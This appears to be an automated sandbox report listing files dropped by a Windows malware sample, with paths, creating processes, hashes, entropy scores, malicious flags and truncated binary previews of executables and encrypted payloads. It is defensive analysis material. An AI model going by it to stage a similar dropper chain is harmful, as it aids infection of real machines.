                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe
                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):71954
                                                                                              Entropy (8bit):7.996617769952133
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                              Malicious:true
                                                                                              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):328
                                                                                              Entropy (8bit):3.1363752421440023
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:kKEvR/L9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:eRaDnLNkPlE99SNxAhUe/3
                                                                                              MD5:5CAB80CD96CCACA461B0DFABE01D5812
                                                                                              SHA1:22D0121515ACCF5510AE73B763433A671342537E
                                                                                              SHA-256:3FAFE95E9597B535F371DB2CE2401118A6516842C415BEA116CC68FB67FDAF31
                                                                                              SHA-512:FBEF4A94C8FD794D928C011349A0942E8E0364953B881E3ED4136198935B56B9C395223688E3BCC45A49E1B2D7EFDA42C09F647D09934F4F2245D3D65268CAC2
                                                                                              Malicious:false
                                                                                              Preview:p...... ........d.kz.L..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                              C:\Users\user\AppData\Local\Temp\585711\Depression.com

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:modified
                                                                                              Size (bytes):947288
                                                                                              Entropy (8bit):6.630612696399572
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                              MD5:62D09F076E6E0240548C2F837536A46A
                                                                                              SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                              SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                              SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: nanophanotool.exe, Detection: malicious, Browse
                                                                                              • Filename: 5y2VCFOB05.exe, Detection: malicious, Browse
                                                                                              • Filename: 5y2VCFOB05.exe, Detection: malicious, Browse
                                                                                              • Filename: PQwHxAiBGt.exe, Detection: malicious, Browse
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              • Filename: SeT_up.exe, Detection: malicious, Browse
                                                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\585711\Depression.com
                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):65440
                                                                                              Entropy (8bit):6.049806962480652
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                                                                              MD5:0D5DF43AF2916F47D00C1573797C1A13
                                                                                              SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                                                                              SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                                                                                              SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......

                                                                                              C:\Users\user\AppData\Local\Temp\585711\Y

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):2758195
                                                                                              Entropy (8bit):7.999930924074638
                                                                                              Encrypted:true
                                                                                              SSDEEP:49152:PFa4PNJ9sfYo7nk/o8jyKBghOhOQ7bwWlVrAHGfcG8VaQt+bs/2OdW+d6zf:Q4P39sfzk/hjyKB7ltLcGCaM6Kzknzf
                                                                                              MD5:EEABFF90A4763BC188583D4F52D3ED3E
                                                                                              SHA1:16DAD570BE93045223E3FE2D3DCCD1EF08651175
                                                                                              SHA-256:D5D9183DF170FCC23D6A64F55034C61B37EB714AF1A1C026D83E1F46B1F4888E
                                                                                              SHA-512:0361288B7D31410AC1FF2844E8416FE3F3EC0CA2B1455BCFEFF7479662404285898E25CFF47472CB9EF007F2E339A4268A0C2D755456193C8F63C9D48000EBCD
                                                                                              Malicious:true
                                                                                              Preview:}Z.*..-..IR(.h.._e.a.iZ.j.....WV.......F..Y.+.*V.N.....+}4:o...1....%.x.......>..P.zE.....j'..'#Z..1...i..M*.........#7.z...=._..j.....{..(......Y..pm6..9..+.X.Q....#.;...#........i...#i............v.4.1...E..}....e.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rq...F.O.'.F...h..............K..7....K..7...kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..w.!..,P..Myn.2..t.W.....*...n..IB.K......K..7...m.....I.....5...x..2).U.j....2>..#.~.\.HE......i_.H...U>D.s.,t..?.....=.a....:'...&F,]._..dWx-.d...[f..&g..!....B ....e..6..r8}*7..2s.7~s...>~.YH.m....x)e9.L..D'q...`.I.X.@9..n..C..52nB..wt..^*@.Z....'.8..Q.r9...M.+7.....{uY..Pf........3..XI-Xop..,t..=.EW..D.o1S..T*......3....n.e.Q

                                                                                              C:\Users\user\AppData\Local\Temp\Ada

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):85134
                                                                                              Entropy (8bit):6.941319396723298
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:OWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:OWy4ZNoGmROL7F1G7ho2kOb
                                                                                              MD5:C25664A12AFDEF03C7D5DA57FCD2FB10
                                                                                              SHA1:BC201D2D58E50C0B1DEBC2A4CEFC159EFF3155DA
                                                                                              SHA-256:9BCCC2D6A92BAC346880C9EEDEED737728F4964C6187FE562B2F3A260CC3A5E5
                                                                                              SHA-512:E09805621377893EBB4B6D7F9E9C21ADAA554DCFD042AC9A3C858B3E20E1D1D92AD3DBD7EF84F059D78D3BD8DEB4678FDC25C526238F79445713D343F82E61A4
                                                                                              Malicious:false
                                                                                              Preview:t.c.o.d.e. .(.r.e.s.e.r.v.e.d. .f.o.r. .A.u.t.o.I.t. .i.n.t.e.r.n.a.l. .u.s.e.)...+.V.a.r.i.a.b.l.e. .c.a.n.n.o.t. .b.e. .a.c.c.e.s.s.e.d. .i.n. .t.h.i.s. .m.a.n.n.e.r.....F.u.n.c. .r.e.a.s.s.i.g.n. .n.o.t. .a.l.l.o.w.e.d...*.F.u.n.c. .r.e.a.s.s.i.g.n. .o.n. .g.l.o.b.a.l. .l.e.v.e.l. .n.o.t. .a.l.l.o.w.e.d...........(...0...`.........................................................................................................................................................................................................."".!...............!!.#3S33"!.!! ............$3W3SCS"!..............&#C3W6#bbB!!.........!!$36$$2S433b2.........!..$$5sc63bSC3S!..........3bc353S336%bbb!.........C353C$4543333S!........#53Cb6&"Cb5bCb3R.. .....3bc#53C633C353c6.!......535c6$$3562Cc53S1......%6$33S3bE6%6%56$32.....!#34443b3333333336"....!.63...$".....!!.!S6......3T"..#R.......!.3S!! ...S2B...3!.....!.#631.....6&".!.$1!...!.!53SQ!!...336"...3""R1.!.3b31.....5cW2...53c3!!.#S461!!..$333S!.!#b3S...36#52....

                                                                                              C:\Users\user\AppData\Local\Temp\Alumni

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):90112
                                                                                              Entropy (8bit):7.997828968222553
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:4gQuTNPDyf2qGfjOJlUkhvIhABjyZ/utqBTIPetzRMEsIOZ4MP6fJ:4mNPO+3fylhvIhAB8getzy9gfJ
                                                                                              MD5:6647B0C3D61384A8F00E6C92AE0DB1BE
                                                                                              SHA1:FF8C8CB6656843C05E544806D886C82AFB6B50AE
                                                                                              SHA-256:F609264D4479B118D6216450E47D17D560829CB6AABC7A4FE7CA349439D4EA43
                                                                                              SHA-512:316081F233E8F6D45C9B3A941A16496A901A022987AEE5DA98377306A1E3E8235C452C235139B7DFB4FDC62CE378987C76E5C34D2A447CB22D12F1C152BE3781
                                                                                              Malicious:true
                                                                                              Preview:..]..p..NH.$.CM..SUz.5.XU@..8W..\..>..W....-.E....>`..h..[*t....vB...Vx.}j....b.\_^z:..@.eP. ..@.<.\.6(.."6.H....9..2..Pk...".,..Ve.#a..-..1:?.T2.....0.....$C.....2`k.e.}.B@.=.w..4j..@o.7.....z\g.W.........y0*..6...9.W.1..S.M[....B.s...'.r....&..,9S..K..T..S......X...Tb7.....+..'......2.;o....s.J.`X..y'.cAi)q....G.oqk.4..............z.BW....0).rf.[..D.}...WS.ab.../....B6.6.O..0.9.U..W...pl0.3..dj.ON.._[..{....j.n..R..+.....0.)MI...x........G.....I).&{.v....cg........")ajA...9p........."...`^b.....ahD...m.E..}.2F5...x[.B......Z..M.....2..V...q...?1*v.R^.(...k3....'V...."I^T'..p....+4.t....+.......w9...cb......-.w..BC....#.~.vJL...6.x.\.H.O8.j....bu.|3.K.P.Gxd..Y^.M]".e...g.~$j...K..j6....`..'....&(..R....R.............v./..i9t......Q8.I.".....'.....mY..@......]...s.?...{....!....r.....y.d...2../...`...o^k...."wQ.A......F.g..2;....;"....W].....-8g.....r.9.>}8.%.z..q.....^1.......K.A...a...&.C.....|<..Q..-.7.w.gp..3Fp.#....V...3g]+

                                                                                              C:\Users\user\AppData\Local\Temp\Angle

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):58368
                                                                                              Entropy (8bit):7.997006362446014
                                                                                              Encrypted:true
                                                                                              SSDEEP:768:zIjKv43iz5avEJBzMMOFPBY1Ol3yUNx2BwqkmTV4/73Aj6qVWjF9Wq1jfbvcZEE8:sjKwSz7U1BMm3PqBwJ/7weosnL5oz8
                                                                                              MD5:B03AE72AA8E0E89C9845EEF4B7715DB3
                                                                                              SHA1:A440892F48110B104E49C8ED985A4F17A0E170D8
                                                                                              SHA-256:CE96FB35D1B42D0E816C8E7AEB0C69EDC45419C882A229BB095CA76C94BAAA52
                                                                                              SHA-512:25FD4F2C9970FFF4BA802298CBC48FF97D3409A83EF11355E50F73CF9E43CDD3D8DCE6A88DEE61152C43DB006D6180FBD50B300B7E7032BF4DFD2F6747A0F0DC
                                                                                              Malicious:true
                                                                                              Preview:...6....I.;..&.!\*..@.Q@u;j<o..w.~;.]O..{6.c.6E}c@.*.GJi..K%.....U.8.".<k`E7.U^N..@f.............5....D..G.:>.H-...!M..P..l^...TW..&...r .D...\.......k.=..W....\.b..s.._.S..N.......%..!...2.r..k..........R...cm.OtO.M<...*.{w.?..2...-~.....`!@........a6C...>.`..<X..4...,..;.H/6.3......4..*._.......P.jK.P;.....4.F......}.!.....J*.S.......n?..3.$yD.qP#h..X.'.&..4m.E..K.x.LtJ...:g.x.1_3.l..`..2.^.h...C...kY=....o.A}.!.#|.F..8Z......1.^f.0....'......C_S..:j..iW.Ed.A....z."v^....|q?^...h...S:....^...z.$.....I...B....".]....~.n0..J-.reH.#V<.....2..+k..K...=uA.D...X..0.O...,........O>h..)mf_^..$../......D..pdZ;1...3<T.igO.....K...bW.}.Z5.vy........$..YY...do.p..I....W..o.....i..;<m.#..W.. A.L%lM...}C.zL.{.N.(..n^.w>...E4|.oo..*3....c..`...*.v.....LW...u|..w.I..O.l...*....1i.]^D...]...IN..d...$.us:o.K.q.-..b\W.X.`..t..NnV&..o_...Ss.6E..Z.a...Br.K.oA....ta8.su+..]`.U.../S ..'B.3.2$(.k.8...J.MHv.....S[.2.-..wzh8........^..3.".+.......tE.h.V..:P]..

                                                                                              C:\Users\user\AppData\Local\Temp\Assume

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):72704
                                                                                              Entropy (8bit):7.9976384774924245
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:rgqgchLGR8QM0oCNxFkt389Gm0Z3PnWsLNe:rgqfhLGaQM0KtsgmEP3g
                                                                                              MD5:5DF6D9067BFDD85161CB0C80CFA247BC
                                                                                              SHA1:AEB2975EB04D7D9C1D21D49E5780B07F830756DC
                                                                                              SHA-256:B2FF21D61ED2C7792A552B85B8F477456447D4AD959527F987181D846AB66332
                                                                                              SHA-512:8B1D57AC9463C59AEBF94BBDCC129F190DCA540E5062ABB7CAF36CA3AF504689BB125ECE2BFBE47D8EEC533512F25C15EFA996A93243D24C8A75AC1BF2FD99AF
                                                                                              Malicious:true
                                                                                              Preview:|....L....U.S.^...._.!......XD..?>.......!\.` Z...`..p.%.o).^<.g....:.2O.X[...`$.W........o.>cL.XV&h............)..;...f.....^....q....'.T...M......,..'..Cv...m..p.-~P_.(h[........v.xkP2J.|..M.e8.W..q...D.^..[.($...5quJ..C..]/..>....N&|...../..4.63..$...R ..M.c1...A....[..7.v~.9."c..::.UZ.... (..rd5.C...G.....@2..{.*....6...l.....;k....,'.dr..5..l.O......M.p.X.f.(..v.+....)...2..%.,&....7.b..0..K.x.&.+.'lV...&..F+.ru.........T..n.^{.u.+r.t..F...^.../8..0.......o.)...w..K=.f..w..r.~.a..(>U.j../..xpr....u...)"H..v.."..8=P.`..g..O.@1.......0:G....f.#.k..Ds.b9[.q.q..z..HI.y. .:<.|]6.t.}.....[3...+..\.z|...[.i.....R........*..*#N....j...l8.>.)a..i.-b....T7.....ZX...7da.)...)V...GS.w..h...2.-..x)...k=.......e...gj..G..fj.r...w....y...9xO.......n.^>./d.O..^...K..,F.?..L...s.....(. ?/wE.]l.T..c..$p...s]...@;o&'...........2..S....fB...r.z.x..5.....aBL..bu7>.Y...o.Z".PH.....W....nv.:@.6....o..C.....R..jF..........;./E.Fu..s@...3.5..A...8.@.@.

                                                                                              C:\Users\user\AppData\Local\Temp\Chad

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):150528
                                                                                              Entropy (8bit):6.502766768549396
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:UdgQa8Bp/LxyA3laW2UDQWf05mjccBiqXvpgF4qv+32eOyKODOSpQSF:EgQaE/loUDtf0accB3gBmmLsiS+SF
                                                                                              MD5:32EF9FA036C6F6FE9CFD1BE8169FB435
                                                                                              SHA1:634D4E340611614990E33580F29FF41C7B806DC0
                                                                                              SHA-256:FB3D1085E94A69EE8E6070A3FA04C3264F4F23019C3543A5F0C1C6F9B99E4CA8
                                                                                              SHA-512:47AA5528487DC1A349E55FB79B22DF207D69002257BA46165F3E6728C64798156D70C4D6A27A35CC0C09BD6F7A83522F650FCC75ECD1367634E93B5340C0168C
                                                                                              Malicious:false
                                                                                              Preview:.....F......3W.........F.........t.......QU.........R...G...O.3._^[..]....B..T....r.j.R......E.....s....C...B.........W......._....W..............M..Q.......C.....#K......O.......;....W.....U..C......r...............A..e.........R....7.N..........F...........jX........N.......w..u.t..v..u......5......C...........F.......O.........K......P.......................w..^...t/.N......O...F.......P...F...........j.V........._..G...~.........P.......w.t..v.............C......v....F.......Q.....+...K.....kQ........9.........!....w..^...t........v....7.....H.............)A..$..)A..C...............:Q.....t..../......]..j....E....F.......................Q......._.....................G..p........N.............C.............>...N.....u....dQ............N.;...c.........M.....t.........].......E....C........h.................;..............V...7...................G..X...`....[..X...I......S...$..*A....U..<........HQ......._............9Q...7.F.............0k...C..v..E.;...BQ...X...tC.N........

                                                                                              C:\Users\user\AppData\Local\Temp\Combines

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):86016
                                                                                              Entropy (8bit):6.560696517203381
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:Its/M26N7oKzYkBvRmLORuCYm9PrpmESvn+pqFqaynB6GMKY99z+ajU1Rji:It8T6pUkBJR8CThpmESv+AqVnBypIbi
                                                                                              MD5:926C1E6D724B0083737649C570E9A5B2
                                                                                              SHA1:670BBC9B1F3962BA2B78741FA650B526E5853124
                                                                                              SHA-256:2397C676F4DE97A107209C15AAB138B5CDEC2E27C37E5C223C590D77D3EBE131
                                                                                              SHA-512:2C43F75003024A8C21B579117022E6EA91AE69A7982868510EA2BB2AB9D60E66E9EDEDCF224D7CB99310E583CA95F883DFCD4E8D31C1EBC27323515F6C101652
                                                                                              Malicious:false
                                                                                              Preview:..9}.|.j._.u.........&....F...........!t..u.SQ.u.WVP.u.............tb...u]+}...tV..tM.M...$...M..$....;.~...SQ..$..YPV.J......SQ.M...$..YPS.M......P.,.......t...WVW..@t(..t..M...#.....>.u.........F......>.C.....tf...t+.....1.....t..M..........u....].......E..(..t..M..~....]..E........u....]......E....F......................txJ...t9...........t..M.........V..>.^..u....\...j.X.F..>.^.......t..M.........E..}...6..t..+....g..j.X.......3.@.7.G..S..t..M.....f...E..}...t...6.%..6. ..t..M........E..}...t...6....6........G......73._^[....U..E....SVW....`....}....V....]....+]..} ..E........M..N....u.......}...F..@.tX;.}....z....F..X.C...l...Sj..v..M..^....M$.E.P.t...M..S..L.....SV.u......V..............;.}.... ....F..X.C.......Sj..v..M.......M$.E.P.Rt.....P.u........t?.s.V....S.u...W....................M$..V..d..V.v...W.p...Y.@..3.j.Z.C..........Q.K....4...V.u.W.Q....M$...3.f..>W.d..W.-...Y......M.......} .to.u....<.....t............8....F......P.M..k....M$.E.P.us..j..M..]...E.

                                                                                              C:\Users\user\AppData\Local\Temp\Confident

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):74752
                                                                                              Entropy (8bit):7.997748356523362
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:nnamb/rFnSPiXJMQqPh4GkTX7aO6BN4Z5/rq3M233guavgOmyOC:naKrFnCQQhDeX776BN2rqNgzYOUC
                                                                                              MD5:1A72CF0B81C845F7B20A61A9BCA6AC52
                                                                                              SHA1:FC8892805B695433A6332E481C71BC1C9B0A4FCB
                                                                                              SHA-256:BC7BF6BADC2E2BA2DDF340BF8C84BD571265A7509C039BE361D2417CB08E00DE
                                                                                              SHA-512:0CCF024D88E70A119B6E48517F6068293970287E1F26E00320465C41AB3C7926CCD9B1048136EE3BF439E4C618DCAB78D46DFE8529EA3407DA0CB8CA42B181B3
                                                                                              Malicious:true
                                                                                              Preview:..%(s>...|.MQw.9T..f...s;......~..v..*..-.+......yM...v2..lw.1y..#&....<\..\.~.4.N&.^....k..WE.'"....KV.g..p^...v.2x'..i..d....N....IN.8...tlX..........uA...B..G...3...?4s?...z|......d'....}.0r.L.....n>.....'./*.....w.#..2..F.a...-~...kbI/.S.....3.;4).?...(:.....=....Y.M._(..1.....<7X..Q.17e.Jf..g..e.a....I...y..V]f....3...2..x.O..%.TDb-pT)Xl....'=.e.?.?.P... ....<.....j.,m.k{..5.1.m..)..z.3..}....z2.$.?]d...@...V....E.f.L.<..7m.Z...V.....@.........}$?M...Qm.b).H....r..[.".*.?.Q....P.c.....rw....k2..Z.u..9=S.Tk.`;...x.+.;.E..K`y.-r......=.*...1.@...iwi.FW^3.c...T..7V....[..s:.A.p.n...k...~.k...K8.^...h..C..pA....O.tL.8.-z...........2X.)....:...\....]P..G.+..0FYD<....]..&.j.t....X.;Y..]..5.}M.U;z..m.zw.aV...."."..u..T%.PE..../..D.!..T>...qB..n..B.*G... .[....U.%.....k8.5#.b.._..t|`c....../^'M...!..L.8.....'-..H..%.......P6....p..E5.%<.^..&....1.....j...v....{c.....R.=..N...Ts...Rh.......U.+.<},...q...83...$.. W.<.......F...........y.}?3w

                                                                                              C:\Users\user\AppData\Local\Temp\Consecutive

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):56320
                                                                                              Entropy (8bit):7.996854910776274
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:E+ah3nINpLTgQI3A0r8+XxRc0VarnLRXeQV12Fus1R5y:0hXINZA3X42x204r3ITR5y
                                                                                              MD5:3B92EC07C51E875DD82609C8DDE9AA55
                                                                                              SHA1:2AC3510F5F3EC06C1A3405FDD3C4EDC4712AB965
                                                                                              SHA-256:63841277229874B2028098286663DAD14484B9D21D007AF686E81AFF2C9AF4E4
                                                                                              SHA-512:566D8C19ABAED7A26A1F3D675B68BDFB9FA564A9D87295BA9C8A1304D9BA04196D4004D0A78C04CCEBDF2E80CF2C3A3B6B66BA354C7EB8066BED6F11F3CFE9DE
                                                                                              Malicious:true
                                                                                              Preview:W..?.)c....._..e.4nX..4.....1..Bl..6k....5.g.......exaT.j..Y..u...3O.b.\(..'>..5t..nQJl..z.....i.8nwY\.c....6C...u=.m...6...x.......?t3.m.=.?...q...r.....-..[}.!....[b"=,.|.N....t.........'.... ?.v^p.....EZ.H....l..,f..5..M."L}9.d. ..N0j.<Ggt.}X..`.B.....,%.Pf..7....Ph.^<....%O....kNcY...m.J.$.]s../XI....iE....'...Q]..@0.E.)f..x..;..~_7.R...##.....fn.j.g........X_..;b......&N..........<..h.a..:hv....u......_R......|..3U...B...cv.n._....J.M..6{....tx....,y.}...Y...d....\W...*.1`..u.:......Kg3!+.H...o..p....."........~.Pkla.0QH....Jmm.#3:......qY.@.{..S..0.z..6...c..I..%x."......a...jP[H...dyRJ...#....RK........yy...s.).F...u.|...;&1...wq@_.h'.@.3.>..\5.R.A.&j...A...(.s..Bo'%....+..].m...0[.]TEd..d'.<.D+^$....PZ..Yk....`z..D*4..j=.....a-K`K..Q......M.3w..q....:....2[f...:]wD.....B.B.p\.(U..H!..F....3.-.F'M|S...R......Ce.I..g.L..$..0.e.a?..o.....P...G).Y..S.JY\L. ...5....s.Qs.........F-....%l."......ncY..7 ...........)Q...gj..$...}.$.u..

                                                                                              C:\Users\user\AppData\Local\Temp\Crm

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):92160
                                                                                              Entropy (8bit):7.998344383994233
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:ZmsxWODuVNj/u72komcdOs9gciUVOqmd0cH4cZk10IJKDjPx4clgP:gsDuj27ny3V1eVXZFKKDazP
                                                                                              MD5:EEE67A38B6D5A1B266EEAC4DF21B27CD
                                                                                              SHA1:1F7F09A4464C2F8BA15CCC43FD36772AA25E66A7
                                                                                              SHA-256:6D390D5F5ED531736CD229361D9F56E7839FEB091B5F78E419AA423CACBF379C
                                                                                              SHA-512:D7167E3774663B3C893A9613F6B1F5CFFB4A55BA6DF4FC0B378879D7416FF506CC82C2A445ABA03907AD42E94AD816CF8C36D7963AE20BD1DDA39A8CDD470AB7
                                                                                              Malicious:true
                                                                                              Preview:.8S......Y..........E?df..`..tm.5i..W.F..*D..z...E6....C.N.;.t.N.N3.'f.o{...8v{X/Re0..w{)......$..T..<j..\..F.'.O.s3.x.-.t"...H..4~....B..o._..3..C...x...X'p...q_Q...&~.].]1..b'.w.w^.......7A\..r....et!R._{..r....`y/...p.m..q...UI"8..#]....O.V.)..G...[`......d.j(lA..~.;.6SJ....7......E.q.j?,C.s.[TR..QPL.Em.../r...l!......2..eu.n.....K....}.w.N..&........[......:.>#....%4.0....uq?0...c....C.&...(r...:......D.0.|.&'...m........t.\.B.....7\U.&.6v......v...MK.:U..K}.......*.6z.u.l;.l.u.E.-.q4.O.8...p...4p{i>.Z.g....m.a..X./...S.h1...q.a..M=w...2.....T(.1R'...iQ.{Z....EPb..4.[M.........z...pST.^..1l...(d.|.r.Ix..Tt.&Ax.G..>&..n.MG..V.V......fr..1........m...A."d.+}'....Cg.....=...f]}Q.|.Q...8.{..b...;3.A%..-......'....zS...m.Y..z...]....Y........Z.Lo...ib.y........w9........-.....J.M.4.....9.~.o.._.. .C...x...5..`...7...8.K...B..:..l.C.7$E..i,.......tE.e../.St.hb......0E..{0!J....q.]=......L.q.~.4....C.v....1..|P......p....I.....K

                                                                                              C:\Users\user\AppData\Local\Temp\Disturbed

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):59392
                                                                                              Entropy (8bit):7.996769193682483
                                                                                              Encrypted:true
